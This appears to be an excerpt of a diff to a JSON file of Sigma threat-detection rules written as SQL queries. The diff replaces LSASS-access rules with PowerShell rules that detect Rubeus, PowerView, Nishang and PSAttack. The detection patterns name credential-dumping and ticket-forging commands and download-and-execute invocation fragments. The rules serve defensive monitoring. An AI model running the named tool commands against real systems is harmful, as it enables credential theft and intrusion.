hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + 
"title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names 
and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' 
ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't 
access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' 
ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - 
